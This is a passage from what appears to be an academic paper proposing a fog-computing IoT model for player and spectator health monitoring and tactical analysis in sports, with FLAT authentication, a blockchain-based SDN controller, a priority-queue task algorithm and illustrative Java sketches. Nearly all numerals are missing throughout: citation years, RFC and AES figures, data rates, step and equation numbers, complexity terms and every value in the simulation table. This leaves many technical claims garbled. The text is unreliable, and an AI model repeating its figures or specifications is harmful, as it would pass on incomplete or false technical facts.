consists of remote cloud servers. it provides sufficient storage and information processing services (mukherjee et al., ). the data obtained from the end devices (sensors) having the restricted source in the first layer are processed by the fog nodes in the second layer. then, this data is sent either to the cloud in the third layer or to other end devices (smartphone, etc.) in the first layer. thus, latency is reduced and data to the cloud is preserved. important advantages of fog computing (bonomi et al., ): low latency, preprocessing of data to the cloud for permanent storage, and so saving bandwidth, data processing without connecting to the internet, compatible with many sensor nodes, real-time applications can be produced, and sufficient resources for data processing and calculation. due to these advantages, fog computing is used in the tactical analysis and health monitoring model we proposed. security requirements for fog computing in iot applications although fog computing provides some security capabilities to iot systems, it has security and privacy needs against potential threats. the data detected in the end nodes must be protected when transferring between devices. fog computing is an important interlayer between the cloud and the user to reduce latency and protect data. 
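to make the division of labour described above concrete, the short java sketch below shows a fog node that analyses a sensor reading locally, answers the end devices immediately, and forwards only data that must be stored permanently to the cloud after encrypting it. this is our illustration, not code from the paper; the class and method names and the pre-shared key are assumptions.

    import java.util.Base64;
    import javax.crypto.Cipher;
    import javax.crypto.KeyGenerator;
    import javax.crypto.SecretKey;

    // minimal sketch: local processing at the fog, encrypted forwarding to the cloud
    public class FogRelay {
        private final SecretKey cloudKey;  // pre-shared key for the fog-to-cloud link (assumption)

        public FogRelay(SecretKey cloudKey) { this.cloudKey = cloudKey; }

        public void handle(String reading, boolean needsPermanentStorage) throws Exception {
            String result = analyseLocally(reading);   // low-latency path: processed at the edge
            notifyEndDevices(result);                  // e.g., technical team / club doctor devices
            if (needsPermanentStorage) {
                sendToCloud(encrypt(reading));         // only this path crosses the internet
            }
        }

        private String analyseLocally(String reading) { return "result(" + reading + ")"; }
        private void notifyEndDevices(String result) { System.out.println("to actuators: " + result); }
        private void sendToCloud(String ciphertext) { System.out.println("to cloud: " + ciphertext); }

        private String encrypt(String plain) throws Exception {
            Cipher c = Cipher.getInstance("AES");      // illustrative; a real deployment would fix the mode and iv explicitly
            c.init(Cipher.ENCRYPT_MODE, cloudKey);
            return Base64.getEncoder().encodeToString(c.doFinal(plain.getBytes("UTF-8")));
        }

        public static void main(String[] args) throws Exception {
            FogRelay fog = new FogRelay(KeyGenerator.getInstance("AES").generateKey());
            fog.handle("pulse=72", false);             // processed locally only
            fog.handle("ecg-window", true);            // processed locally and archived in the cloud
        }
    }

the sketch only mirrors the behaviour claimed for the fog layer (low latency locally, bandwidth saved by sending the cloud only what must be kept); it says nothing about how the authors implemented it.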
however, the fog is exposed to some threats due to wireless transmission. there are security principles and protocols for this. security concepts of fog computing the security needs in fog computing and the methods used to meet these needs in the proposed model can be listed as follows (mukherjee et al., ; alrawais et al., ; roman, lopez & mambo, ):
• authentication: resource-restricted iot devices cannot perform the encryption required for authentication. for this, the costly storage and data processing needs are met by outside resources such as fog nodes. users and nodes authenticate in the fog network to get service. authentication is provided in the proposed model with the flat method.
• confidentiality: data must be secured during transmission from the iot node to the fog node or from the fog node to the cloud. for secure communication, the iot device communicates with any fog node in the fog network when it needs data processing and storage. since the resources of the end nodes are restricted, lightweight structures are used to secure this communication. therefore, the flat method is preferred in the proposed model. in the flat model, the fog nodes carry out all security processes that require high computation.
• malicious and unauthorized node prevention: a malicious node in the iot environment leads to the capture, misdirection and replacement of data. when devices on the network cannot mutually verify each other, the attacker can initiate attacks such as rogue gateway, dos (denial of service) and ddos (distributed dos) by continuously sending requests to the fog node. access to the nodes is limited to protect them from malicious nodes. in the proposed model, authentication is provided by the flat method. in addition, data integrity is checked with the blockchain-based sdn structure.
• data integrity: in attacks such as man-in-the-middle (mitm), which can occur at fog nodes, data corruption must be perceived by the fog because the data must be transmitted to the target node without any disruption. if it is not transmitted, the fog nodes must perform the predefined processes. in the proposed model, the blockchain-based sdn controller method is proposed for data integrity.
• accessibility: users must always be able to get service from the resources of the fog nodes. dos and ddos are some of the attacks that prevent accessibility. these attacks should be prevented.
• heterogeneity: data obtained from a large number of devices with different characteristics must be transmitted to the fog nodes. computing and data processing costs increase due to different communication needs. in the proposed model, devices with different features can communicate wirelessly over the zigbee network because they support . .x protocols.
• computing cost: the fog interlayer is used to reduce latency in iot applications. the fog layer needs computing capacity for processing and storing data, generating real-time responses, encryption, etc. these tasks are difficult to perform on resource-constrained devices. in the proposed model, high-computation processes are carried out in the fog nodes. thus, the accessibility of the system is maintained.
overview of iot protocols in the iot systems, different lightweight protocols are used together with the tcp/ip protocol set. these protocols provide effective communication for resource-constrained structures. this section discusses the lightweight protocols used in the proposed model.
� the constrained application protocol (coap): it is a web transport protocol that is specialized for use in low power and loss networks with restricted nodes (shelby, hartke & bormann, ). it is defined in rfc . it can work with low power and limited devices up to kib data size and kib code size (bormann, ersue & keranen, ). coap is implemented on udp by default for minimum resource usage. coap has a header structure of bytes (optionally * b) (shelby, hartke & bormann, ). coap consists of layers. it provides low power multicast support. karakaya and akleylek ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ it can easily interact with http. in the proposed model, coap is used in the communication management of fog nodes and end devices. � zigbee protocol: zigbee is an open and global standard used for wireless personal area networks in low power applications. it can transmit kbit/s at distances up to meters indoors and over meters outdoors. zigbee uses the aes- structure in its standard security mechanism (li, jia & xue, ). in the proposed model, the data obtained from the sensors are transmitted by zigbee networks due to reasons such as the width of the coverage area in the outdoor, low power and supporting a large number of iot nodes. proposed model this section contains overview of the proposed model. it includes task management in the fog nodes, security details. an iot model is proposed on health and tactical analysis monitoring in sports using fog computing. appropriate sensors are placed as a wearable technology for players and spectators. thanks to the data obtained from these sensors, health conditions are monitored and team-based tactical analysis is performed. in addition, environmental factors (temperature, humidity, ball position etc.) are collected from the sensors. the data obtained from the sensors are transmitted locally and wirelessly to the fog nodes in the zigbee network. the data is processed in fog nodes and results are sent to the club doctor and the technical team. since there is a local network, data is transmitted more safely and quickly. the data flow and zigbee structure of the proposed model are shown in fig. . details of the proposed model in the proposed model, data is collected from players or spectators in the sports competition. since the received health data is huge and responses with low latency are required, processing and storing of the data should be done quickly. also, the data obtained from the ball and players are processed with low latency and position analysis should be done. for this reason, fog computing is used in the proposed model. also, if there is data to be stored permanently in the cloud system, the data can be encrypted when it is sent to the cloud via the internet. sensors such as body temperature, pulse, distance and motion, sensitive position, ecg are placed in players. these sensors are found on the player’s clothing or directly on their body, such as wristbands and body bands. in this way, wban are created. in addition, health problems that require first aid that can occur in the spectator are monitored. therefore, it is assumed that this wbans are designed for the spectator as well as the players. these products are difficult to provide as wearable technology is still developing. therefore, wearable technologies are not included in the scope of this article. 
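since the fog nodes deliver results to the end devices over coap in the proposed model, the sketch below shows what such an exchange could look like from an end device using the eclipse californium coap library. it is only an illustration under the assumption that a fog node exposes coap resources; the uri, resource names and payload are hypothetical and the paper's own implementation is not shown.

    import org.eclipse.californium.core.CoapClient;
    import org.eclipse.californium.core.CoapResponse;
    import org.eclipse.californium.core.coap.MediaTypeRegistry;

    // minimal coap exchange sketch: an end device posts a reading to a fog node
    // and then reads back the processed result (resource names are hypothetical).
    public class CoapEndDeviceDemo {
        public static void main(String[] args) {
            CoapClient sensorResource = new CoapClient("coap://fog-node.local:5683/readings");
            CoapResponse post = sensorResource.post("player=7;pulse=101", MediaTypeRegistry.TEXT_PLAIN);
            if (post != null && post.isSuccess()) {
                System.out.println("reading accepted by fog node");
            }

            CoapClient resultResource = new CoapClient("coap://fog-node.local:5683/results/player7");
            CoapResponse result = resultResource.get();   // low-latency response produced in the fog layer
            if (result != null) {
                System.out.println("result: " + result.getResponseText());
            }
        }
    }

coap over udp keeps the header and code footprint small, which is why a lightweight client like this fits the resource-constrained end devices described above.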
in this article, a safe fog-based infrastructure is proposed for health and tactical analysis in the field of sports. data flow in fig. : the data obtained from players or spectators with wban are transmitted to fog servers; then the results of the data processed in the fog servers are transmitted to the devices of the technical team and club doctors. the local operation of the system reduces latency in data processing and transmission. this helps early treatment if players or spectators are injured. in addition, according to the analysis, it enables the technical team to apply tactical changes early. in order to protect the position and tactical data of the two teams, the nodes of each team must authenticate. data communication of the end node devices performing sensing and monitoring is shown in fig. . federated lightweight authentication of things (flat) is used for secure data communication and for nodes to recognize each other. in security operations, bandwidth is reduced by using implicit certificates. the zigbee network is used to transmit the data obtained from the sensors to the fog nodes.
figure: the data flow and zigbee structure of the proposed model.
figure: sensors and their possible locations in system actors.
the zigbee network has its own security methods. in addition, a blockchain-based sdn controller mechanism is used for recording transactions and checking data integrity. traditionally, in iot applications that use only the cloud, data is sent either without encryption or with encryption performed on the resource-restricted end nodes. this causes either the data to be stolen or the end device to use its resources inefficiently. in the proposed model, security and efficient usage of resources are provided since the detected data is encrypted in the fog nodes and then sent to the cloud. in addition, all operations requiring high computing power in the security phase are performed in the fog nodes. therefore, the proposed model is lightweight and efficient. the layers of the proposed model are given in fig. .
• the perception and end node layer consists of sensors used for collecting data and of user end devices.
• in the middle layer, a network is required to transmit the data to the fog layer. this network is local and uses the zigbee protocol, which allows a large number of devices to communicate.
• in the fog layer, data processing and storage are performed by fog nodes. after the data is processed, it is sent to the perception and end node layer or to the cloud layer for permanent storage. data sent to the cloud layer is encrypted in the fog layer due to the insecure internet.
• the network layer includes the internet connection between the fog and the cloud layer. this layer exchanges data between the cloud and fog layers.
• the cloud layer carries out the permanent storage and processing of data.
the data obtained from the sensor and end node layer are sent to the fog nodes in the fog layer via zigbee networks in the middle layer. the data is processed in the fog nodes after passing through the task management processes. there are two cases after the results are obtained.
the first case is that the results are sent to the cloud layer via the internet in the network layer for permanent storage. the second case is that the results are sent to the user devices of the sensor and end node layer via zigbee in the middle layer to inform the system actors. the devices in the sensor and end node layer are placed in the same layer because they are located in the same area; the sensors collect data, while the end devices report the results to the system actors.
figure: data communication of end node devices performing sensing and monitoring.
task management in the fog nodes fog nodes perform data processing and storage within the local network. the structure of a fog node is shown in fig. . iot systems can generate data frequently and periodically. this data is stored in a compressed form in the data storage. a timestamp is used to determine which iot device the data comes from and when. the communication management transfers the results it receives from the data distribution service to the iot devices through the coap protocol (yoon et al., ). the security management carries out both the security of the fog and the encryption of data to be sent to the cloud. the distributed management provides management of the data computing processes. the application management provides management of the applications used in the fog. the sdn controller performs control and data integrity processes within the distributed blockchain-based architecture. details of the blockchain-based sdn structure used to verify the data and especially to prevent flooding attacks are examined in "security of the proposed model".
figure: the layers of the proposed model.
figure: the structure of a fog node.
in the proposed health and tactical analysis monitoring model, data is exchanged between the end nodes, the fog and the cloud. the tasks that take place in the fog and cloud nodes are shown in fig. , which shows the main tasks in the fog and cloud and the paths of the raw data and the result data. the data collected by the sensors are sent to the fog layer. after processing in the fog layer, the results are sent either to the devices of the technical team or, after being encrypted, to the cloud for permanent storage. in fig. , the tasks in the fog nodes correspond to data preprocessing and validation (v ), data analysis and classification (v ), computing of health data (v ), computing of tactical analysis data such as possible pass combinations and quality pass analysis using the voronoi graph and delaunay triangulation (v ), encryption and decryption processes for data to and from the cloud (v ), preparation of data for the end nodes (v ), and preparation of data for the cloud (v ). each eij stands for the relationship and data flow between tasks i and j. the graph covers the processes of classifying, analyzing and sending the results to the end devices or the cloud after the data is perceived. the fog node structure given in fig. has management and storage areas that perform these operations. apart from these, there are also fog servers that act as authentication and identity providers.
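the task graph just described can be written down directly as an adjacency structure. the sketch below is our illustration: descriptive task names stand in for the v-numbered tasks, and the edge set eij shown here is an assumption for illustration only, since the actual graph is defined in the paper's figure.

    import java.util.LinkedHashMap;
    import java.util.List;
    import java.util.Map;

    // sketch of the fog-side task graph: vertices are the processing tasks listed in
    // the text and each edge e(i,j) is a data-flow dependency between task i and task j.
    public class FogTaskGraph {
        public static void main(String[] args) {
            Map<String, List<String>> edges = new LinkedHashMap<>();
            edges.put("preprocessAndValidate", List.of("analyseAndClassify"));
            edges.put("analyseAndClassify",    List.of("healthComputation", "tacticalComputation"));
            edges.put("healthComputation",     List.of("prepareForEndNodes", "prepareForCloud"));
            edges.put("tacticalComputation",   List.of("prepareForEndNodes", "prepareForCloud"));
            edges.put("prepareForCloud",       List.of("encryptDecryptForCloud"));
            edges.put("prepareForEndNodes",    List.of());
            edges.put("encryptDecryptForCloud", List.of());

            // print every edge e(i,j) of the assumed graph
            edges.forEach((from, tos) -> tos.forEach(to -> System.out.println("e(" + from + " -> " + to + ")")));
        }
    }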
figure: overview of tasks in the fog and cloud.
iot devices generate a lot of data for real-time processing with low latency tolerance. therefore, task management algorithms are used in the fog nodes. the proposed model uses a priority-queue-based task management algorithm. the operations in fig. show the priority assignment step of this algorithm (choudhari, moh & moh, ). requests from the end devices arrive at the nearest fog node. there are three queues in the fog node: high (qh), medium (qm) and low (ql). each request i is assigned to one of these queues according to the original priority level of the request (sbcat) and according to whether the request delay time (or total service time) delayti lies between the two thresholds (t and t ). this is done with the priority assignment algorithm. in the fog nodes, the request delay time delayti of a request is equal to the difference between the deadline given by the request and its arrival time at the fog node. the total time wi for a request in the fog layer is equal to the sum of the request's waiting time in the queue and its processing time. thus, in accordance with the service level agreement (sla) used in the algorithm, a request i must satisfy wi < delayti to meet the quality of service (qos) requirement. according to the algorithm (choudhari, moh & moh, ), a request i is assigned to the highest priority queue (qh) if the total service time delayti of the request is less than or equal to the estimated service time stiest of the request. otherwise, it is checked whether the total service time of the request lies between the threshold values t and t ; if it is within this range, the original priority level of the request (sbcat) is checked and, accordingly, the request is assigned to the queue qh, qm or ql. finally, if delayti is greater than t , the request is forced into the queue that matches its original priority; if that queue is full, it is assigned to a lower-level queue. thus, higher-priority and shorter processes are allowed to execute first. according to algorithm , the management of fog nodes consists of two steps. in step , each request reqi is sent to the distributor fog node nodedt, which distributes tasks to the other fog nodes. each node estimates its total service capacity from the amount of unused resources. the estimated total service capacity of node k, stkest, is sent to nodedt. this value is kept in an ascending sorted list lnode in nodedt, and the list is constantly updated. each reqi is placed in a queue according to algorithm .
figure: graph of tasks in fog nodes.
in step , the requests in all queues are processed in the order qh, qm, ql. using the lnode list in nodedt, a request reqi is assigned to nodek when the total service capacity stkest of nodek is equal to or greater than the delayti of reqi; the loop is then broken and the next request is handled. if reqi is not assigned to any single fog node, lnode is reversed and looped over again.
if the total time (sum) is greater than or equal to delayti, the reqi is assigned to the group of nodes, the loop is broken and the next request is handled; otherwise, each value in lnode up to that point is summed. after the reversal, lnode(first) is equal to the stest value of the node that was last before the list was reversed. if the reqi cannot be assigned to a group of nodes either, the fog layer cannot serve the request. in this case, the decision is based on the queue holding the request: if the request is in the qh or qm queue, it is rejected; if the request is in the ql queue, it can be sent to the cloud, because the transmission of data to the cloud increases latency. the parameters and definitions of algorithm are shown in table . equation ( ) is used to determine the nodes that supply the reqi request and the limit for the nodes supplying the reqi.

algorithm : priority assignment algorithm.
  priority(delayti, stkest)
    if delayti ≤ stkest then
      return (h)
    else if t < delayti ≤ t then
      if sbcat = then return (h)
      else if sbcat = then return (m)
      else if sbcat = then return (l)
    else if delayti > t then
      if sbcat = then
        if qh is not full then return (h) else return (m)
      else if sbcat = then
        if qm is not full then return (m) else return (l)
      else if sbcat = then
        return (l)

linode ≤ Σ_{k=1}^{n} lknode,   n ≤ size(lnode),   linode ≥ delayti   ( )

the total capacity of the resources is determined according to eq. ( ) for each request (lunode indicates the updated capacity, while lcnode indicates the current capacity).

algorithm : management of fog nodes.
  step
    each fog node sends the stkest (for node k) to nodedt
    nodedt assigns each stkest to the ordered lnode list
    foreach reqi do
      reqi is sent to nodedt
      pri ← priority(delayti, sttest)
      if pri = h then qh(last) ← reqi
      else if pri = m then qm(last) ← reqi
      else if pri = l then ql(last) ← reqi
  step   /* task distribution to fog nodes according to stkest and delayti */
    foreach reqi in qh, qm, ql do
      for lnode(k) do
        if stkest ≥ delayti then
          nodek ← reqi
          break
      if reqi is not assigned to any fog node then
        reversedlist ← reverse(lnode(k))   /* from high to low (processing capacity) */
        sum ← lnode(first)
        for reversedlist do
          if sum ≥ delayti then
            lnode(first), lnode(second), …, lnode(k) ← reqi
            break
          else
            sum ← sum + lnode(next)
      if reqi is not assigned to any fog node group then
        if (reqi in qh) or (reqi in qm) then
          reject(reqi)
        else if reqi in ql then
          cloud ← reqi

lunode = lcnode − linode   ( )

after each request is finished, the total capacity of resources is updated according to eq. ( ).

lunode = lcnode + linode   ( )

in the big-o complexity analysis of algorithm , the delayti and stiest values are assumed to be already calculated. each request is handled in o( ) complexity, so the total complexity for n requests is o(n). in the big-o complexity analysis of algorithm , step has o(n) complexity for n requests because it uses algorithm . in step , the number of requests in each queue to be processed is n and the number of fog nodes is m. the worst case is that a request is not assigned to any fog node; in this case, the worst-case complexity of step is n · m + m + . the complexity of step and step together is n + n · m + m + . the complexity of the algorithm according to big-o notation is o(n · m).
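a compact java rendering of the priority assignment rule and of the two capacity-update equations above is given below. it is a sketch written from the textual description, not the authors' code: the threshold values, the category codes mapped to h/m/l, and the queue occupancy flags are illustrative assumptions.

    // sketch of the priority assignment algorithm and the capacity bookkeeping;
    // thresholds, category codes and queue flags are assumptions for illustration.
    public class PriorityAssignment {
        enum Level { H, M, L }

        static final double T1 = 50.0, T2 = 100.0;      // illustrative thresholds t and t
        static boolean qhFull = false, qmFull = false;  // queue occupancy flags (stubbed)

        // delayT: request delay time, stEst: estimated service time, sbcat: original priority category
        static Level priority(double delayT, double stEst, int sbcat) {
            if (delayT <= stEst) return Level.H;
            if (delayT > T1 && delayT <= T2) {
                return sbcat == 1 ? Level.H : (sbcat == 2 ? Level.M : Level.L);
            }
            // any remaining case is treated like the delayT > t2 branch in this sketch:
            // force the request into its original priority, demoting it if that queue is full
            if (sbcat == 1) return qhFull ? Level.M : Level.H;
            if (sbcat == 2) return qmFull ? Level.L : Level.M;
            return Level.L;
        }

        // reserve capacity when a request is placed, release it when the request finishes
        static double reserve(double currentCapacity, double requestCapacity) { return currentCapacity - requestCapacity; }
        static double release(double currentCapacity, double requestCapacity) { return currentCapacity + requestCapacity; }

        public static void main(String[] args) {
            System.out.println(priority(30, 40, 3));    // H: fits the estimated service time
            System.out.println(priority(80, 40, 2));    // M: between the thresholds, medium category
            System.out.println(priority(120, 40, 1));   // H (or M if qh were full): forced to original priority
            double cap = reserve(500, 120);             // node capacity after placing a request
            System.out.println(release(cap, 120));      // capacity restored after the request finishes
        }
    }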
security of the proposed model perceived data circulates among a large number of nodes: it is processed in the fog nodes, sent back to the end nodes, and stored in the cloud via the internet. short-range zigbee networks have security mechanisms such as the aes- encryption method and the renewal of keys at short intervals (li, jia & xue, ). in addition, authentication, data privacy and integrity must be ensured, and data must be transmitted encrypted over the internet. therefore, the implicit certificate-based flat method is used for authentication and data privacy in the proposed model (santos et al., ). data integrity is ensured and flooding attacks are detected with the blockchain-based sdn controller. secure communication between the fog and the cloud is performed with public key cryptography. in the proposed model, the flat method is used for authentication between the iot sensors and the fog nodes. only the data of legitimate sensors are taken into the fog nodes. if an attacking node successfully passes the flat authentication stage in any way, its data still passes through the sdn controller; in this way, a warning is raised in unreliable situations, while the sdn controller does not warn in reliable situations. the security of the proposed model is provided in these two stages. however, in this article, only the proposed task management algorithm is simulated.
table: parameters for the proposed algorithm (algorithm ).
qh, qm, ql: priority queues
reqi: request
delayti: delay cost for request i
sttest: estimated total capacity of requests in queue
stkest: estimated service capacity of node k
nodedt: distributor node
lnode: capacity list of ordered nodes
lknode: k-th element of the node list
nodek: k-th node
data privacy and authentication federated lightweight authentication of things is used in the proposed model for authentication and privacy. flat is the adaptation of federated identity management (fidm), the cloud authentication system, to fog computing (santos et al., ). fidm performs authentication and encryption processes at high cost. fidm can be used to provide security between the cloud and the fog; with flat, however, authentication and encryption can be done on resource-restricted devices. therefore, the flat protocol is used in the proposed model. the flat protocol consists of low-computation client devices and high-computation service and identity provider devices. clients are resource-constrained sensor devices and user devices. the service provider (sp) is the fog server. the identity provider (idp), on the other hand, is a server that should work uninterruptedly in the fog network. for the flat protocol, the symmetric key must be preinstalled on the end devices. these keys are created with physical unclonable functions (puf) to be resistant to physical attacks. after the puf output is produced, it is formatted and stored. formatted puf outputs are used to provide trust between the end nodes and the idp. trust between the idp and the sp is provided by digital certificates issued by a common certification provider.
figure: the flat system.
according to fig. (santos et al., ), when the resource-constrained client device wants to access the service, it requests a session key from the idp (in ). the idp transmits the session key to the client (in ). the idp sends its certificate to the sp; the sp sends its certificate to the idp (in , and ). after a secure communication channel has been created, the idp
sends the client key to the sp. as in the fidm system, the client requests a confirmation from the idp and receives approval (in and ). the client requests the service by presenting this confirmation package to the sp (in ). the sp provides the service if the confirmation package is correct (in ). thus the identity is verified and the sp starts the service. each sensor placed on the players and in the sports field must establish a secure session with the fog nodes before sending data to them. for this reason, the flat authentication system is used in the model. the flat system offers a lightweight mechanism for authenticating resource-constrained sensors. the communication of the sensors in the sports field, the identity provider and the service provider in the flat system is shown in fig. . after this process, the task management process starts. in the flat system, both the client and the sp must trust the idp. communication between the idp and the sp takes place using asymmetric key cryptography, while idp-client and sp-client communications take place using symmetric key cryptography. therefore, the flat protocol is more efficient for iot systems using fog computing. to increase the security of the system against attacks, an authentication method can be used between a user and a node that is a trusted authority (soni, pal & islam, ). the flat method uses message authentication codes (macs) and digital signatures for authentication, symmetric and asymmetric encryption for confidentiality, macs, digital signatures and pufs for integrity, mutual authentication of the two parties for availability, and the fidm model that limits access to identity information for privacy (santos et al., ). security with blockchain based sdn controller blockchain is a storage technology that serves as a registry, allowing the transactions performed in the system to be tracked by each node (nofer et al., ). a blockchain consists of a chain of data packets (blocks) and is expanded with each new block added; therefore, it represents a logbook. fog nodes with blockchain-based sdn controllers are used in the fog layer of the proposed model. the structure of the blockchain-based sdn controller is shown in fig. (sharma, chen & park, ). this structure is the sdn controller part of the fog node shown in fig. . communication between the end devices and the fog nodes takes place over the zigbee controller. the zigbee controller is considered a gateway or routing switch for the sdn controller in the fog node. the sdn controller structure consists of three steps (sharma, chen & park, ).
• step : the packet parser carries out tracking and parsing operations to identify basic messages from arrived packets. each packet must be captured and parsed to identify abnormal situations. the packet parsing phase handles four messages: features_reply, stats_reply, flow_mod and packet_in. an attacker has to capture a subset of these messages to change the network structure of the sdn controller. the packet parser dynamically tracks arrived packets to extract metadata.
• step : the flow topology graph builder carries out the operations of parsing the metadata property set and the network topology to analyze datasets from the packet parsing
the logical and physical topologies of metadata for each flow are stored. the system distinguishes changes, malicious updates, and security strategy violations by looking at the graph of the stream topology created and byte/packet statistics transferred for each flow. � step : the verifier confirms the metadata according to the management strategies defined by the analyst. it marks the known attacks in line with management strategies. it warns only when it recognizes an unreliable condition, not for every flow. the migration agent recognizes attacks like flooding and makes decisions after received alerts. these decisions are added to the reactive rules of the parser. in case of flooding attack, it sends the packets to the data plane cache which is a temporary storage area, to prevent the controller from flooding and overloading. after updating the flow rule, the cached packets are processed. due to the blockchain-based sdn controller, data changes and flooding attacks are detected in the fog layer (sharma, chen & park, ). thus, data integrity is provided. the sdn controller method can be integrated into the proposed model to ensure data integrity during data transmission from sensors to fog nodes. in the proposed model, the arrived packages in fig. consist of raw data generated by the sensors. when this method is used, the data flow on the topology is examined before the task management starts in the fog nodes. thus, data can be supported to reach the fog nodes safely. analysis of the proposed model in this section, the proposed model is analyzed in terms of low latency, data accuracy, authentication and privacy, data integrity and accessibility, bandwidth savings. low latency since fog computing is a locally operating mechanism, fog computing and iot based health and tactical analysis monitoring model in sports have low latency. thus, rapid intervention, which is very important in health, can be provided. it is also important that data processing and response transmissions are done quickly for technical issues. research data from an artificial intelligence expert at the stats analytics company, shows that it is important to take action quickly under a tactically negative situation: “you identify a specific scenario that tends to disrupt the opponent, giving you, say, a -s window where the opponent is disorganized” (burn-murdoch, ). since the data is processed on fog servers without the internet, the delay time in transmitting the response is low. in addition, response time and cost are further reduced with the fog task management algorithm based on process priorities (choudhari, moh & moh, ). data on which the response delay time is ignored is encrypted on the fog servers and processed or stored in the remote cloud server. accuracy of perceived data correct positions must be taken from players and the ball to carry out tactical analyzes. linear position sensors are used for this. by determining the positions of each node with karakaya and akleylek ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ linear position sensors, methods such as voronoi graph, delaunay triangle, dominant regions and shading are obtained. these methods help to make tactical analysis. zigbee network is used for the devices to communicate with each other. the risk of data corruption is reduced due to the reasons such as the coverage of the zigbee network within the field boundaries and using the aes- symmetric encryption structure in it. 
therefore, the zigbee protocol contributes to the accurate acquisition of data. since the fog nodes are close to the end devices, the fog layer in our model reduces the risk of data corruption due to distance. authentication and privacy the proposed model uses the flat protocol for authentication and data privacy. flat is efficient for iot applications with resource-constrained devices and using fog computing (santos et al., ). in fidm using cloud computing, the client is directed to idp after communicating with sp first. however, in the flat protocol, the client directly contacts idp to reduce this cost. in the certificate exchange between sp and idp, the cost of asymmetric encryption is negligible, since both providers are servers with high computing power. symmetric switches are assigned to formatted puf output to clients with limited resources before the system starts processing. therefore, client-sp and client-idp communications are secured with symmetric encryption, which is lightweight. in the proposed model, asymmetric and symmetric encryptions are used for authentication and data security, and privacy is also provided. according to the flat protocol, since the transported data is encrypted, data content cannot be accessed even if the data is captured in man-in-the-middle (mitm) attacks. also, in order to prevent mitm, digital signatures are verified by exchanging certificates between idp and sp before sending the shared key to sp. the client’s identity is also verified by idp using symmetric keys. the attacker cannot obtain the implicit certificate supplied by a legitimate certification authority and the private key of the fog node. thus, impersonation attacks can be prevented because fog nodes use certificates and signatures. figure the structure of the blockchain based sdn controller. full-size doi: . /peerj-cs. /fig- karakaya and akleylek ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ data integrity and accessibility in iot applications using fog layer, the data perceived from the sensor devices are transmitted from the wireless environments to the fog nodes, so they may have vulnerabilities against attacks. some security measures (such as encryption) are taken by the zigbee network and the flat method, which is lightweight and secure, is used for authentication. flat also supports the protection of data integrity for fog nodes with methods such as digital signature. however, in order to protect the integrity of the data obtained from end nodes, blockchain based sdn controller structure is used in the fog layer. a flow topology graphic is created by parsing the arrived packets. then, the data verification is performed in verifier according to defined rules. this method is especially effective against flooding attacks. packages are stored in the data plane cache to prevent flooding and overloading of the sdn controller. thus, the system continues to operate without loss of information and overflow. the cached packets are processed after high flow is over. thus, the sdn controller can detect and warn attacks such as false topology, arp poisoning and ddos (sharma, chen & park, ). with blockchain’s distributed data management, the cost of the system is reduced and its integrity and data security are ensured (yang, cha & song, ). bandwidth savings implicit certificate structure is used in certificate changes. 
the implicit certificate, also called the elliptic curve qu-vanstone (ecqv) certificate, is a public key certificate (santos et al., ). implicit certificates include the id, the public key, and the digital signature of the certification authority. since these data are sent as a single public key certificate, not separately, the certificate size decreases. thus, bandwidth is significantly saved. simulation of the proposed model this section includes the detailed simulation of the proposed algorithm using the ifogsim program. topology the number of nodes in the fog layer, and accordingly the topology structure, can be changed. in the simulation of the proposed algorithm, three fog nodes arranged in two levels are used in the fog layer. in fig. , one of the three nodes is only responsible for communication with the cloud and performs storage tasks. the other two nodes carry out the requests and transmit the results to the actuators. in fig. , the node f- represents the numofgateways variable in the simulation, while the nodes f- and f- represent the numofenddevpergateway variable. the nodes s- , s- , s- and s- represent the sensors on the players and in the sports field. the t- and t- nodes represent actuators such as the technical team and club doctors. in the simulation, it is assumed that the data obtained from the sensors have successfully passed the security steps and are completely legitimate. the simulation covers placing requests on the fog nodes and the proposed resource management algorithm. features of fog nodes used in simulation the features of the simulation application are taken as an example from buyya & srirama ( ). in the simulation, fog nodes are created with the linux operating system, x architecture and xen as the virtual machine manager. additionally, the createfogdevice function is used to create a new fog node. accordingly, the parameters of this function and the properties of the fog nodes are given in table . structure of the simulation application three modules are used in the application: "clientmodule", "mainmodule" and "storagemodule". it is assumed that the "clientmodule" is placed on the end fog devices and the "storagemodule" on the cloud device. the "mainmodule" is the starting module. the modules, the names given to the data exchanges and the directions of the tuples used in data transmission are shown in fig. (buyya & srirama, ).
figure: the topology used in the simulation of the proposed algorithm.
table: features of fog nodes used in simulation.
features: .level fog devices / .level fog devices
mips: , / ,
ram: , / ,
upbw: , / ,
downbw: , /
level: /
ratepermips: /
busypower: . / .
idlepower: . / .
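the properties listed in the table above map naturally onto a small parameter object that a device-construction helper could consume. the sketch below is our illustration, not the ifogsim createfogdevice signature itself, and the numeric values are placeholders rather than the values used in the paper.

    // sketch: the fog-device properties from the table as a simple parameter record.
    // the numbers below are placeholders only; the actual per-level values are those of the table above.
    public class FogDeviceSpec {
        final String name;
        final long mips;                    // processing capacity
        final int ramMb;                    // memory
        final long upBw, downBw;            // uplink / downlink bandwidth
        final int level;                    // position in the two-level fog hierarchy
        final double ratePerMips;           // cost of processing
        final double busyPower, idlePower;  // power model parameters

        FogDeviceSpec(String name, long mips, int ramMb, long upBw, long downBw,
                      int level, double ratePerMips, double busyPower, double idlePower) {
            this.name = name; this.mips = mips; this.ramMb = ramMb; this.upBw = upBw;
            this.downBw = downBw; this.level = level; this.ratePerMips = ratePerMips;
            this.busyPower = busyPower; this.idlePower = idlePower;
        }

        public static void main(String[] args) {
            FogDeviceSpec gatewayLevel   = new FogDeviceSpec("gateway-node", 10000, 4096, 10000, 10000, 1, 0.01, 107.3, 83.4);
            FogDeviceSpec endDeviceLevel = new FogDeviceSpec("end-level-node", 5000, 2048, 10000, 10000, 2, 0.0, 87.5, 82.4);
            System.out.println(gatewayLevel.name + " level " + gatewayLevel.level + ", mips " + gatewayLevel.mips);
            System.out.println(endDeviceLevel.name + " level " + endDeviceLevel.level + ", mips " + endDeviceLevel.mips);
        }
    }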
